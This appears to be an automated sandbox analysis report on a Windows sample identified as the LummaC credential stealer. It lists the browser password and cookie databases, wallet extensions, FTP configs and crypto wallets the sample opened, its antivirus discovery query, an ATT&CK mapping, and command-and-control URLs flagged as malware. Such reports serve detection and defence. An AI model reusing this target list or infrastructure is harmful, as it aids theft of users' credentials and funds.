Source: file.exe, 00000000.00000003.1676138982.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676473842.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757983380.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731678959.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758812343.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731950919.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 8384, type: MEMORYSTR
Source: Yara match	File source: 0.2.file.exe.ad0000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.1638705497.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet/
Source: file.exe, 00000000.00000003.1637044911.0000000005750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.1638488484.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1638647726.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets\U

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 8384, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 8384, type: MEMORYSTR
Source: Yara match	File source: 0.2.file.exe.ad0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	861 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	44 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	61%	ReversingLabs	Win32.Trojan.LummaStealer
file.exe	57%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.XPACK.Gen

Source	Detection	Scanner	Label
https://jowinjoinery.icu/bdWUaq	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/bdWUate	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/d	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/bdWUas	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/bdWUaY:	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/Y	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/bdWUa5#Q	0%	Avira URL Cloud	safe
https://jowinjoinery.icu/bdWUa	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
https://jowinjoinery.icu:443/bdWUa	100%	Avira URL Cloud	malware
